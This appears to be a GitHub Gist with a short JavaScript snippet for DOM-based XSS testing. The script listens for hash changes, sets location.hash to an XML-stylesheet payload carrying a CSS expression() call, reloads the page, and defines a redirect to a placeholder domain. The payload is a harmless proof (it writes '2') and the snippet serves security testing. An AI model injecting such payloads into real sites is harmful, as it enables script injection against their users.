Created
October 9, 2016 13:33
-
-
Save xsscx/e0f0f5af0c266c02f135d6aaf397cbe4 to your computer and use it in GitHub Desktop.
location.hash listener update on change, inject javascript, domxss test
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| if( 'onHashChange' in window ) { | |
| window.addEventListener('hashchange', getHashValue, false); | |
| function getHashValue() { | |
| return window.location.hash; | |
| } | |
| } | |
| console.log(window.location.hash); | |
| window.location.hash = '#<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>'; | |
| console.log(window.location.hash); | |
| window.location.reload(true); | |
| function reloadPageWithHash() { | |
| var initialPage = window.location.pathname; | |
| window.location.replace('https://exmaple.com/#' + initialPage); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment